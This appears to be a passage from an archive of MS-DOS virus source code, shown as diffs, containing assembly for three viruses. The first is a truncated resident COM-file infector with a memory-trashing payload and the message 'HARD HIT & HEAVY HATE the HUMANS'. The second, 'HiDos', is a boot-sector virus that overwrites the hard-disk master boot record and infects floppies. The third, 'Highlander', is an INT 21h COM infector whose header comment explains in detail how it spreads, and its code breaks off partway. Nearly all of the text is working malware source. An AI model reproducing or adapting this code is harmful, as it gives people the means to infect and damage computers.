sub word ptr ds:[2],384
mov di,3
mov si,bx
mov cx,(offset memory-offset resid) shr 1 +1
cld
rep movsw
mov ax,es
sub ax,10h
mov ds,ax
mov dx,offset irq
mov ax,251ch
int 21h
mov ah,2ah
int 21h
cmp al,1
jne zipp
dec al
out 0a0h,al
mov al,dma
out 41h,al
zipp:
mov ax,cs
mov ds,ax
mov es,ax
pop ax
push cs
mov cx,100h
push cx
mov cx,ds:[0feh]
sub cx,100h
retf
eltarol dw 20cdh
eltarol2 db 90h
;######################### Vyrus activated ##########################
csik: mov ax,0e000h
mov ds,ax
csiky: mov ds:[0],al
inc al
jmp csiky
;######################### propagation part ##########################
eredeti: db 0eah ; original
int211 dw 0
int212 dw 0
counter dw 0
szaporodas: cmp ah,4bh
jne eredeti
or al,al
jnz eredeti
push ax
push es
push bx
push ds
push dx
mov bx,dx
koj: inc bx
cmp byte ptr [bx],'.'
jne koj
cmp byte ptr[bx+1],'C'
jne kiugras1
mov cs:kds,ds
mov cs:kdx,dx
mov cs:kbx,bx
call probe
kiugras1: pop dx
pop ds
pop bx
pop es
pop ax
jmp eredeti
kds dw 0
kdx dw 0
kbx dw 0
kkk dw 0
fszam dw 0
probe: push cs
pop es
mov di,offset memory
mov si,dx
mov cx,40
cld
rep movsw
mov bx,0ff0h
mov ah,48h
int 21h
jnc juk1
ret
;!!!!! memoria lefoglalva (kkk = Seg)
atr dw 0
juk1: mov cs:kkk,ax
mov dx,offset memory
push ds
pop es
mov bx,cs:kbx
mov byte ptr [bx+1],'A'
call elorutin
push cs
pop ds ;DS:DX a masolt nev.
mov ax,4300h
int 21h
mov atr,cx
xor cx,cx
mov ax,4301h
int 21h
;!!!!! Attr allitas
cmp cs:attrflag,0
jz juk2
mov ds,cs:kds
jmp memoff
juk2: mov di,kdx ;ES:DI a regi nev atirva
mov ah,56h
int 21h
call utorutin ;!!!!! Atnevezve
mov dx,cs:kdx
push es
pop ds
mov ax,3d02h
int 21h ;!!!!! File megnyitva
mov cs:fszam,ax
mov ds,cs:kkk
xor dx,dx
mov bx,ax
mov cx,0fc00h-(offset memory-offset resid)
mov ah,3fh
int 21h
cmp ax,0fc00h-(offset memory-offset resid)
;!!!!! Beolvasva a program (csak a hossza miatt)
je hosszu ;zarjuk le a file-t
cmp ax,7580
jb hosszu ;tul rovid a file
mov di,ax
mov bx,ds:[1]
cmp word ptr [bx+3],0b950h
;$$$$$$$$$$$$$$$$$$$$$$$$$ FUCK OFF TASM,MASM $$$$$$$$$$$$$$$$$$$$$$$$$$$
je hosszu
push di
mov cx,(offset memory-offset resid)
mov si,offset resid
push ds
pop es
push cs
pop ds
inc byte ptr ds:[offset jhg1 +2]
mov ax,es:[0]
mov eltarol,ax
mov al,es:[2]
mov eltarol2,al
rep movsw ;!!!!! Atmasolva (hehe)
mov al,byte ptr ds:[offset jhg1 +2]
pop di
add di,(offset begin-offset resid)
mov cx,offset memory - offset begin ;#### coding ####
jhga: xor byte ptr es:[di],al
inc di
loop jhga
sub di,(offset memory - offset resid)
push di ;Az ugrasi hely
mov bx,fszam
mov cx,offset memory - offset begin
mov dx,di
push es
pop ds
mov ah,40h
int 21h
pop di
cmp ax,offset memory - offset begin
je ghj1
hosszu: jmp zardle
ghj1: ;!!!!! Kiirva a vege
mov byte ptr ds:[0],0e9h
sub di,3
mov ds:[1],di
mov bx,cs:fszam
xor cx,cx
xor dx,dx
mov ax,4200h
push bx
int 21h
pop bx
mov cx,3
xor dx,dx
mov ah,40h
int 21h
zardle: mov bx,cs:fszam
mov ah,3eh
int 21h ;!!!!! File lezarva
push cs
pop es
mov di,offset memory
mov ds,cs:kds
mov dx,cs:kdx
mov ah,56h
int 21h ;!!!!! File visszanevezve
mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
mov ax,4301h
mov cx,cs:atr
int 21h ;!!!!! attr visszaall
memoff: mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
push cs
pop ds
mov es,cs:kkk
mov ah,49h
int 21h ;!!!!! Memoria visszaalt
ret
it241 dw 0
it242 dw 0
attrflag db 0
elorutin: mov cs:attrflag,0
xor ax,ax
mov ds,ax
mov ax,ds:[90h]
mov cs:it241,ax
mov ax,ds:[92h]
mov cs:it242,ax
mov ds:[90h],offset it24
mov ds:[92h],cs
ret
utorutin: xor ax,ax
mov ds,ax
mov ax,cs:it241
mov ds:[90h],ax
mov ax,cs:it242
mov ds:[92h],ax
ret
it24: mov cs:attrflag,1
xor al,al
iret
vanesik db 0
irq: cli
push ds
push es
push ax
push bx
push cx
push dx
push si
push di
cmp cs:counter,0
je sabad
dec cs:counter
jne sabad
xor ax,ax
mov ds,ax
mov ax,ds:[84h]
mov cs:int211,ax
mov ax,ds:[86h]
mov cs:int212,ax
mov ds:[84h],offset szaporodas
mov ds:[86h],cs
sabad: cmp cs:vanesik,0
je keress
call idovan
jmp jumper
keress: call ruut
jumper: pop di
pop si
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
iret
idovan: xor ah,ah
int 1ah
and dx,suruseg
jne rutyi
call action
rutyi: ret
ruut: mov ax,0b800h
mov es,ax
mov di,cs:did
mov cx,512
cld
poke: jcxz huy
mov al,'E'
repnz scasb
jz talalt
huy: cmp di,4095
jb kisebb
mov cs:did,0
ret
kisebb: add cs:did,512
ret
did dw 0
talalt: test di,1
jz poke
mov dl,es:[di+1]
mov dh,es:[di+3]
or dx,2020h
cmp dx,6973h ;'is'
jne poke
mov bl,es:[di+5]
or bl,20h
cmp bl,'k'
jne poke
mov cs:vanesik,1
jmp huy
action: mov ax,cs
mov ds,ax
mov es,ax
mov vanesik,0
mov pontszam,1
mov si,offset zizi
mov di,offset novi
cld
mov cx,6
rep movsw
call zoldseg
jammed: mov ax,3
int 10h
cmp counterr,atvar
jne fdr
push cs
pop es
lea bx,mess
mov ax,1301h
mov bx,1
xor dx,dx
mov cx,offset drt-offset mess
int 10h
fdr: ret
counterr dw 0
zoldseg: cli
mov di,offset memory
xor ax,ax
cld
mov cx,200*3
rep stosw
mov ah,0c0h
mov si,3333h
int 15h
cmp si,3333h
mov ax,xtvar
je xt
mov ax,atvar
xt: mov counterr,ax
mov ax,3502h
int 21h
cmp bx,0e9eh
jne ibm
call init1
mov pontm,100
mov port,22h
jmp entry
ibm: ;Ibm bulik
mov pontm,200
mov al,70h
mov port,60h ;%
mov ah,15
int 10h
cmp al,7
jne cga
call init3
jmp entry
cga: call init2
jmp entry
port dw 22h
pontm dw 100
init1: mov ax,200h
mov es,ax
xor di,di
mov cx,4000h
cld
xor ax,ax
rep stosw
mov plotdw,offset plot
mov unplotdw,offset unplot
ret
init2: mov ax,0b800h
mov es,ax
mov ax,6
int 10h
mov plotdw,offset plotcga
mov unplotdw,offset unplotcga
ret
init3: mov ax,0b000h
mov es,ax
call prog
mov plotdw,offset plotherc
mov unplotdw,offset unplotcga
ret
prog: mov dx,3bfh
mov al,3
out dx,al
mov al,28h
mov dx,3b8h
out dx,al
mov ah,0
mov cx,12
lea bx,ports
lopi1: mov dx,03b4h
mov al,ah
out dx,al
inc ah
mov dx,03b5h
mov al,[bx]
out dx,al
inc bx
loop lopi1
mov dx,3bfh
mov al,3
out dx,al
mov dx,3b8h
mov al,0ah
out dx,al
xor di,di
mov cx,4000h
xor ax,ax
cld
rep stosw
ret
ports db 35h,2dh,2eh,7,5bh,2,57h,57h,2,3,0,0
;**************************** Forgatorutin ************************************
even
sina dw 0
cosa dw 0 ;si-t meghagyja
sinb dw 0
cosb dw 0
pontszam dw 1
transzform: ;be: di=X, bx=Y, cx=Z, SINA,COSA,SINB,COSB
; add bx,ytol ;ez itt jolesz
shl di,1
shl bx,1 ;X es Y elokeszitese a szorzashoz
mov ax,di
imul cosa
mov bp,dx
mov ax,bx
imul sina
add bp,dx ; bp=X' = cosa*X + sina*Y
mov ax,bx
imul cosa
mov bx,dx
mov ax,di
imul sina
sub bx,dx ; bx=Y' = cosa*X - sina*Y
shl bp,1
shl cx,1 ;X' es Z elokeszitese
mov ax,bp
imul cosb
mov di,dx
mov ax,cx
imul sinb
sub di,dx ; di=X'' = cosb*X' - sinb*Z
mov cx,di
mov ax,bx
ret
comment @
mov ax,cx
imul cosb
mov cx,dx
mov ax,bp
imul sinb
add cx,dx ; cx=Z'' = cosb*Z = sinb*X'
; out: di=X'' bx=Y'' cx=Z''
mov dx,keptav
;****************************** PERSPEKTIVA **********************************
mov ax,di
shl ax,1
imul tavol
mov cx,dx
mov ax,bx
shl ax,1
imul tavol
mov ax,dx
ret ; ki : CX=X' AX=Y'
@
plotherc: ; al=y cx=x
xor ah,ah
mov dx,ax
shr dx,1
add ax,dx
mov dx,cx
mov cl,al
and cl,3
shr ax,1
shr al,1
mov di,2000h
shl di,cl
mov cl,90
mul cl
add di,ax
mov ax,dx
mov cx,dx
jmp ezisi
plotcga: xor di,di
shr ax,1
jnc tryp
mov di,2000h
tryp: mov dl,80
mul dl
add di,ax
mov ax,cx
ezisi: shr ax,1
shr ax,1
shr ax,1
add di,ax
and cl,7
mov al,128
shr al,cl
or es:[di],al
jmp ezis1
unplotcga: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di],al
ret
plot: ;AL = y koord. cx = x koord.
mov dl,160
mul dl
mov di,ax
mov ax,cx
shr ax,1
shr ax,1
add di,ax
and di,-2
and cl,7
mov al,128
shr al,cl
or es:[di+egy],al
ezis1: mov [bx],al
inc bx
mov [bx],di
add bx,2
ret
unplot: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di+egy],al
ret
kezdfazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
ck1: push cx
lodsw
mov cx,ax
shl cx,1
add cx,320
lodsw
add si,2
add ax,50
call word ptr [plotdw]
pop cx
loop ck1
ret
indy db 0
fazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
mov indy,1
ck12: push cx
call word ptr [unplotdw]
push bx
lodsw
mov di,ax
lodsw
mov bx,ax
lodsw
mov cx,ax
call transzform
pop bx
add ax,50
mov di,bxpo
add al,[di]
shl cx,1
add cx,bxpo2
cmp indy,0
je ruty
mov indy,0
cmp karal2,0
jne ruty
push cx
push ax
inc cx
call word ptr [plotdw]
pop ax
pop cx
sub bx,3
ruty: call word ptr [plotdw]
pop cx
loop ck12
ret
novpont: mov ax,pontm
cmp pontszam,ax
je trew
mov cx,pontm
sub cx,pontszam
mov ch,cl
shR cx,1
shr cx,1
yut: loop yut
inc pontszam
ret
trew: call movie
mov bx,bxpo
cmp bx,offset patt
je valto
cmp bx,offset patt+29
je valto
iuy: add bx,novi
mov bxpo,bx
ret
valto: neg novi
jmp iuy
novi dw -1
bxpo dw offset patt
bxpo2 dw 320
novi2 dw 4
karal dw 300
karal2 dw 600
zizi dw -1,offset patt,320,4,300,600
movie: cmp karal,0
je jesty
dec karal
ret
jesty: cmp karal2,0
je jesty2
dec karal2
jesty2: mov bx,bxpo2
cmp bx,100
je valto2
cmp bx,540
je valto2
iuy2: add bx,novi2
mov bxpo2,bx
ret
valto2: neg novi2
jmp iuy2
elokesz: call novpont
mov bl,szogx
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sina,ax
mov ax,costabl[bx]
mov cosa,ax
mov bl,szogy
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sinb,ax
mov ax,costabl[bx]
mov cosb,ax
mov al,szogxvalt
add szogx,al
mov al,szogyvalt
add szogy,al
ret
even
szogx db 0
szogy db 0
szogxvalt db 2
szogyvalt db 5
tavol dw 32767
phase: call elokesz
call fazisrajz
ret
entry: call kezdfazisrajz
rajta1: call phase
cmp pontm,100
je apc
cmp byte ptr ds:[offset ruut +2],0b8h
je ccggaa
mov cx,counterr
mov dx,3bah
qaz1: in al,dx
and al,1
jnz qaz1
qaz2: in al,dx
and al,1
jz qaz2
loop qaz1
jmp apc
ccggaa: mov dx,3dah
qaz3: in al,dx
and al,8
jnz qaz3
qaz4: in al,dx
and al,8
jz qaz4
apc: mov dx,port
in al,dx
and al,1
jz rajta1
ret
even
plotdw dw 0
unplotdw dw 0
sintabl dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602, 6393
dw 7179, 7962, 8739, 9512, 10278, 11039, 11793, 12539, 13279
dw 14010, 14732, 15446, 16151, 16846, 17530, 18204, 18868, 19519
dw 20159, 20787, 21403, 22005, 22594, 23170, 23731, 24279, 24811
dw 25329, 25832, 26319, 26790, 27245, 27683, 28105, 28510, 28898
dw 29268, 29621, 29956, 30273, 30571, 30852, 31113, 31356, 31580
dw 31785, 31971, 32137, 32285, 32412, 32521, 32609, 32678, 32728
dw 32757, 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571, 30273
dw 29956, 29621, 29268, 28898, 28510, 28105, 27683, 27245, 26790
dw 26319, 25832, 25329, 24811, 24279, 23731, 23170, 22594, 22005
dw 21403, 20787, 20159, 19519, 18868, 18204, 17530, 16846, 16151
dw 15446, 14732, 14010, 13279, 12539, 11793, 11039, 10278, 9512
dw 8739, 7962, 7179, 6393, 5602, 4808, 4011, 3212, 2410
dw 1608, 804, 0, -804, -1608, -2410, -3212, -4011, -4808
dw -5602, -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539,-13279,-14010,-14732,-15446,-16151,-16846,-17530,-18204
dw -18868,-19519,-20159,-20787,-21403,-22005,-22594,-23170,-23731
dw -24279,-24811,-25329,-25832,-26319,-26790,-27245,-27683,-28105
dw -28510,-28898,-29268,-29621,-29956,-30273,-30571,-30852,-31113
dw -31356,-31580,-31785,-31971,-32137,-32285,-32412,-32521,-32609
dw -32678,-32728,-32757,-32767,-32757,-32728,-32678,-32609,-32521
dw -32412,-32285,-32137,-31971,-31785,-31580,-31356,-31113,-30852
dw -30571,-30273,-29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245,-26790,-26319,-25832,-25329,-24811,-24279,-23731,-23170
dw -22594,-22005,-21403,-20787,-20159,-19519,-18868,-18204,-17530
dw -16846,-16151,-15446,-14732,-14010,-13279,-12539,-11793,-11039
dw -10278, -9512, -8739, -7962, -7179, -6393, -5602, -4808, -4011
dw -3212, -2410, -1608, -804
costabl dw 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571
dw 30273, 29956, 29621, 29268, 28898, 28510, 28105, 27683
dw 27245, 26790, 26319, 25832, 25329, 24811, 24279, 23731
dw 23170, 22594, 22005, 21403, 20787, 20159, 19519, 18868
dw 18204, 17530, 16846, 16151, 15446, 14732, 14010, 13279
dw 12539, 11793, 11039, 10278, 9512, 8739, 7962, 7179
dw 6393, 5602, 4808, 4011, 3212, 2410, 1608, 804
dw 0, -804, -1608, -2410, -3212, -4011, -4808, -5602
dw -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539, -13279,-14010,-14732,-15446,-16151,-16846,-17530
dw -18204, -18868,-19519,-20159,-20787,-21403,-22005,-22594
dw -23170, -23731,-24279,-24811,-25329,-25832,-26319,-26790
dw -27245, -27683,-28105,-28510,-28898,-29268,-29621,-29956
dw -30273, -30571,-30852,-31113,-31356,-31580,-31785,-31971
dw -32137, -32285,-32412,-32521,-32609,-32678,-32728,-32757
dw -32767, -32757,-32728,-32678,-32609,-32521,-32412,-32285
dw -32137, -31971,-31785,-31580,-31356,-31113,-30852,-30571
dw -30273, -29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245, -26790,-26319,-25832,-25329,-24811,-24279,-23731
dw -23170, -22594,-22005,-21403,-20787,-20159,-19519,-18868
dw -18204, -17530,-16846,-16151,-15446,-14732,-14010,-13279
dw -12539, -11793,-11039,-10278, -9512, -8739, -7962, -7179
dw -6393, -5602, -4808, -4011, -3212, -2410, -1608, -804
dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602
dw 6393, 7179, 7962, 8739, 9512, 10278, 11039, 11793
dw 12539, 13279, 14010, 14732, 15446, 16151, 16846, 17530
dw 18204, 18868, 19519, 20159, 20787, 21403, 22005, 22594
dw 23170, 23731, 24279, 24811, 25329, 25832, 26319, 26790
dw 27245, 27683, 28105, 28510, 28898, 29268, 29621, 29956
dw 30273, 30571, 30852, 31113, 31356, 31580, 31785, 31971
dw 32137, 32285, 32412, 32521, 32609, 32678, 32728, 32757
gombdata:
DW 44, 3, 22, 29, 6, 40, 7, 9, 48,-14, 12, 46
DW -33, 15, 33,-44, 18, 14,-44, 21, -7,-35, 24,-25
DW -19, 26,-37, 0, 29,-40, 17, 31,-34, 29, 34,-21
DW 33, 36, -5, 30, 38, 9, 20, 40, 20, 8, 42, 25
DW -3, 43, 23,-12, 45, 17,-16, 46, 8,-15, 47, 0
DW -11, 48, -5, -5, 49, -7, 0, 49, -6, 0, 49, -2
DW 0, 49, 0, -2, 49, 0, -6, 49, 0, -7, 49, -5
DW -5, 48,-11, 0, 47,-15, 8, 46,-16, 17, 45,-12
DW 23, 43, -3, 25, 42, 8, 20, 40, 20, 9, 38, 30
DW -5, 36, 33,-21, 34, 29,-34, 31, 17,-40, 29, 0
DW -37,26,-19,-25,24,-35,-7,21,-44,14,18,-44
DW 33,15,-33,46,12,-14,48,9,7,40,6,29
DW 22,3,44,0,0,49,-22,-3,44,-40,-6,29
DW -48,-9,7,-46,-12,-14,-33,-15,-33,-14,-18,-44
DW 7,-21,-44,25,-24,-35,37,-26,-19,40,-29,0
DW 34,-31,17,21,-34,29,5,-36,33,-9,-38,30
DW -20,-40,20,-25,-42,8,-23,-43,-3,-17,-45,-12
DW -8,-46,-16,0,-47,-15,5,-48,-11,7,-49,-5
DW 6,-49,0,2,-49,0,0,-49,0,0,-49,-2
DW 0,-49,-6,5,-49,-7,11,-48,-5,15,-47,0
DW 16,-46,8,12,-45,17,3,-43,23,-8,-42,25
DW -20,-40,20,-30,-38,9,-33,-36,-5,-29,-34,-21
DW -17,-31,-34,0,-29,-40,19,-26,-37,35,-24,-25
DW 44,-21,-7,44,-18,14,33,-15,33,14,-12,46
DW -7,-9,48,-29,-6,40,-44,-3,22,-49,0,0
DW -44,3,-22,-29,6,-40,-7,9,-48,14,12,-46
DW 33,15,-33,44,18,-14,44,21,7,35,24,25
DW 19,26,37,0,29,40,-17,31,34,-29,34,21
DW -33,36,5,-30,38,-9,-20,40,-20,-8,42,-25
DW 3,43,-23,12,45,-17,16,46,-8,15,47,0
DW 11,48,5,5,49,7,0,49,6,0,49,2
DW 0,49,0,2,49,0,6,49,0,7,49,5
DW 5,48,11,0,47,15,-8,46,16,-17,45,12
DW -23,43,3,-25,42,-8,-20,40,-20,-9,38,-30
DW 5,36,-33,21,34,-29,34,31,-17,40,29,0
DW 37,26,19,25,24,35,7,21,44,-14,18,44
DW -33,15,33,-46,12,14,-48,9,-7,-40,6,-29
DW -22,3,-44,0,0,-49,22,-3,-44,40,-6,-29
DW 48,-9,-7,46,-12,14,33,-15,33,14,-18,44
DW -7,-21,44,-25,-24,35,-37,-26,19,-40,-29,0
DW -34,-31,-17,-21,-34,-29,-5,-36,-33,9,-38,-30
DW 20,-40,-20,25,-42,-8,23,-43,3,17,-45,12
DW 8,-46,16,0,-47,15,-5,-48,11,-7,-49,5
DW -6,-49,0,-2,-49,0,0,-49,0,0,-49,2
DW 0,-49,6,-5,-49,7,-11,-48,5,-15,-47,0
DW -16,-46,-8,-12,-45,-17,-3,-43,-23,8,-42,-25
DW 20,-40,-20,30,-38,-9,33,-36,5,29,-34,21
DW 17,-31,34,0,-29,40,-19,-26,37,-35,-24,25
DW -44,-21,7,-44,-18,-14,-33,-15,-33,-14,-12,-46
DW 7,-9,-48,29,-6,-40,44,-3,-22,49,0,0
patt: DB 0, 0, 0, 0, 0, 1, 1, 2, 4, 5, 7, 9,11,14,17,20,23,27
db 31,35,40,45,50,56,61,67,73,80,86,93
mess db 'HARD HIT & HEAVY HATE the HUMANS !!'
db ' [ H.H.& H.H. the H. ] '
drt dw 5 dup (0)
memory:
CODE ENDS
END START
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

213
MSDOS/Virus.MSDOS.Unknown.hidos.asm Normal file
View File

@ -0,0 +1,213 @@
NAME boot
PAGE 55,132
TITLE FILE UTIL
code segment
ASSUME CS:CODE,DS:CODE,ES:CODE
org 100h
main: jmp over
db '['
id db 'HiDos]',0
by db 'By Apache',0
over: xor ax,ax
mov ds,ax
cli
mov ss,ax
mov sp,7c00h
sti
mov ax,ds:[004eh]
mov word ptr ds:[int13+7b02h],ax
mov ax,ds:[004ch]
mov word ptr ds:[int13+7b00h],ax
mov ax,ds:[0413h]
dec ax
dec ax
mov ds:[0413h],ax
mov cl,06h
shl ax,cl
mov es,ax
mov word ptr ds:[bigj+7b02h],es
mov ax,offset jumpt
mov word ptr ds:[bigj+7b00h],ax
mov cx,0400h
push cs
pop ds
mov si,7c00h
mov di,0100h
cld
repz
movsb
push cs
pop ds
jmp cs:[bigj+7b00h]
jumpt: push cs
pop ds
mov si,offset drive
cmp byte ptr ds:[si],80h
jz hdone
mov bx,0300h
mov cx,0001h
mov dx,0080h
push cs
pop es
call hdread
cmp ds:[0304h],'iH'
jz hdone
mov bx,0300h
mov cx,0007h
mov dx,0080h
call hdwrit
mov si,04beh
mov di,02beh
mov cx,0042h
cld
repz
movsb
mov byte ptr ds:[drive],80h
mov bx,0100h
mov cx,0001h
mov dx,0080h
call hdwrit
mov byte ptr ds:[drive],00h
hdone: xor ax,ax
mov word ptr cs:[boot+2],ax
mov es,ax
push cs
pop ds
mov ax,0201h
mov bx,7c00h
mov word ptr ds:[boot],bx
mov si,offset drive
cmp byte ptr ds:[si],80h
jz hload
mov cx,0003h
mov dx,0100h
jmp fload
hload: mov cx,0007h
mov dx,0080h
fload: mov di,'rv'
int 13h
mov si,offset drive
mov byte ptr cs:[si],00h
xor ax,ax
mov es,ax
mov ds,ax
mov ax,offset nint13
mov ds:[004ch],ax
mov ds:[004eh],cs
push cs
pop ds
jmp cs:[boot]
hdwrit: mov ax,0301h
mov di,'rv'
jmp xx4
hdread: mov ax,0201h
mov di,'rv'
xx4: int 13h
ret
nint13: cmp di,'rv'
jz iv13
cmp ah,02h
jnz wcheck
cmp cl,01h
jnz wcheck
cmp dh,00h
jnz wcheck
cmp dl,80h
jz check1
cmp dl,00h
jnz wcheck
check1: push ax
push bx
push cx
push dx
push ds
push es
push di
mov bx,0300h
push cs
pop es
call hdread
mov si,offset [id+0200h]
cmp es:[si],'iH'
jz redirect
jmp iflopd
redirect: cmp dl,80h
jnz rdirfl
pop di
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
mov cx,0007h
jmp a13
rdirfl: pop di
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
mov cx,0003h
mov dx,0100h
a13: mov ax,0201h
iv13: jmp v13
wcheck: cmp ah,03h
jnz v13
cmp dl,00h
jnz v13
push ax
push bx
push cx
push dx
push ds
push es
push di
push cs
pop es
mov bx,0300h
mov cx,0001h
xor dx,dx
call hdread
mov si,offset [id+0200h]
cmp es:[si],'iH'
jz iflopd
mov cx,0003h
mov dx,0100h
mov bx,0300h
call hdwrit
mov bx,0100h
xor dx,dx
mov cx,0001h
call hdwrit
iflopd: pop di
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
v13: db 0eah
int13 dd 0h
drive db 0h
bigj dd 0h
boot dd 0h
code ends
end main

422
MSDOS/Virus.MSDOS.Unknown.highland.asm Normal file
View File

@ -0,0 +1,422 @@
;HIGHLAND.COM
;This is the HIGHLANDER Virus version 1.0.
;This virus is a generic, parasitic, resident COM infector. It will not
;infect command.com however. It is not destructive but can be irritating.
;Interrupt 21 is hooked.
;This virus is to be assembled under TASM 2.0 with the /m2 switch.
;When an infected file is executed, the virus code is executed first.
;The virus first checks to see if the virus is already resident. It does
;this by setting the AH register to 0DEh. This subfunction is currently
;unsupported by DOS. Interrupt 21 is then called. If after the call, AH is
;unchanged, the virus is not resident. If AH no longer contains 0DEh, the
;virus is assumed to be resident (If the virus is resident, AH will actually
;be changed to 0EDh. This is never checked for, only a change from 0DEh
;is checked for). If the virus is already resident, the executing viral
;code will restore the host in memory to original condition and allow it
;to execute normally. If however, the virus is not resident, Interrupt 21
;will then be trapped by the virus. Once this is accomplished, the virus
;will free all available memory that it does not need (COM programs are
;allocated all available memory when they are executed even though they can
;only occupy one segment). The viral code will then copy the original
;environment and determine the path and filename of the host program in
;memory. The viral code will then shell out and re-execute the host
;program. The virus is nearly resident now. When the virus shells out
;and re-executes the host, a non-supported value is passed in the AL
;register. This is interpreted by the virus to mean that the infection
;is in transition and that when the host is re-executed, to assume that the
;virus is already resident. This value is then changed to the proper value
;so that the shell process will execute normally (INT 21 is already trapped
;at this point). This shell process is invisible, since the viral code
;so successfully copies the original environment. Once the host has
;finished executing, control is then returned back to the original host
;(the viral code). The virus then completes execution by going resident
;using interrupt 027h. In all appearances, the host program has just
;completed normal execution and has terminated. In actuality, the virus
;is now fully resident.
;When the virus is resident, interrupt 021h is trapped and monitored.
;When a program is executed, the resident virus gets control (DOS executes
;programs by shelling from DOS using interrupt 021h, subfunction 04bh).
;When the virus sees that a program is being executed, a series of checks
;are performed. The first thing checked for is whether or not the program
;to be executed has 'D' as the seventh letter in the filename. If it does
;the program is not infected and is allowed to execute normally (this is
;how the virus keeps from infecting COMMAND.COM. No COM file with a 'D'
;as the seventh letter will be infected). If there is no 'D' as the seventh
;letter, the virus then checks to see if the program to be executed is a
;COM file or not. If it is not a COM file, it is not infected and allowed
;to execute normally. If the COM file test is passed, the file size is then
;checked. Files are only infected if they are larger than 1024 bytes and
;smaller than 62000 bytes. If the file size is within bounds, the file
;is checked to see if it is already infected. Files are only infected
;a single time. The virus determines infection by checking the date/time
;stamp of the file. If the seconds portion of the stamp is equal to 40,
;the file is assumed to be infected. If the file is infected, the virus
;then checks the date. If it is the 29th day of any month, the virus will
;then display its irritating qualities by displaying the message
;'Highlander 1 RULES!' 21 times and then locking the machine and forcing
;a reboot. If the file is not infected, infection will proceed. The
;virus stores the original attributes and then changes the attributes to
;normal, read/write. The file length is also stored. The file is then
;opened and the first part of the file is read and stored in memory (the
;exact number of bytes is the same length as the virus). The virus then
;proceeds to overwrite the first part of the file with its own code. The
;file pointer is then adjusted to the end of the file and a short
;restoration routine is copied. The original first part of the file is
;then copied to the end of the file after the restore routine. The files
;time/date stamp is then adjusted to show an infection (the seconds portion
;of the time is set to 40. This will normally never be noticed since
;directory listings never show the seconds portion). The file is then
;closed and the original attributes are restored. Control is then passed
;to the original INT 021h routine and the now infected program is allowed
;to execute normally.
;This virus will infect read-only files.
;COMMAND.COM will not be infected.
;It is not destructive but can be highly irritating.
.model tiny
.code
IDEAL
begin:
jmp checkinfect ;jump over data to virus code
data1:
dw offset endcode+0100h ;address of restore routine
typekill:
db 01ah ;kills the DOS 'type' command
version:
db 'v05' ;virus version number
data2:
dw 0,080h,0,05ch,0,06ch,0 ;environment string for shell process
data3:
db 'COM' ;COM file check
data4:
db 0,0,1,0 ;data preceeding filename in environment
data5:
db 'Highlander 1 RULES! $' ;irritating message
restcode: ;restoration routine to restore host
rep movsb ;move host code back to original loc
push cs ;setup to transfer control to 0100h
mov ax,0100h
push ax
mov ax,cx ;zero ax
ret ;transfer control to 0100h and allow host
;to execute normally
checkinfect: ;check to see if virus already resident
mov ax,0de00h ;unsupported subfunction
int 21h
cmp ah,0deh ;is it unchanged?
je continfect ;yes, continue going resident
;no, already resident, restore host
restorehost: ;setup for restore routine
mov di,0100h ;destination of bytes to be moved
mov si,[word data1+0100h] ;address of restore routine
;(original host)
push cs ;setup for xfer to restore routine
push si
add si,checkinfect-restcode ;source of bytes to be moved
mov cx,endcode-begin ;number of bytes to move
ret ;xfer to restore routine
continfect: ;continue infection
mov ax,3521h ;set ax to get INT 21 vector address
int 21h ;get INT 21 vector
mov [WORD int21trap+1+0100h],bx
;store address in viral code
mov [WORD int21trap+3+0100h],es
;store segment in viral code
mov dx,offset start+0100h ;set dx to start of viral code
mov ax,2521h ;set ax to change INT 21 vector
int 21h ;change INT 21 to point to virus
mov [word data2+0100h+4],ds ;copy current segment to env string
mov [word data2+0100h+8],ds ;for shell process
mov [word data2+0100h+12],ds
push ds ;restore es to current segment
pop es
mov bx,offset endcode+0100h ;set bx to end of viral code
mov cl,04 ;divide by 16
shr bx,cl
inc bx ;INC by 1 just in case. bx is number of
;paragraphs of memory to reserve
mov ah,04ah ;set ah to release memory
int 21h ;release all excess memory
mov ds,[word 02ch] ;get segment of environment copy
xor si,si ;zero si
cld ;clear direction flag
tryagain:
mov di,offset data4+0100h ;point to data preceeding filename
mov cx,4 ;data is 4 bytes long
repe cmpsb ;check for match
jne tryagain ;if no match, try again
mov dx,si ;filename found. set dx to point
mov bx,offset data2+0100h ;set bx to point to environment string
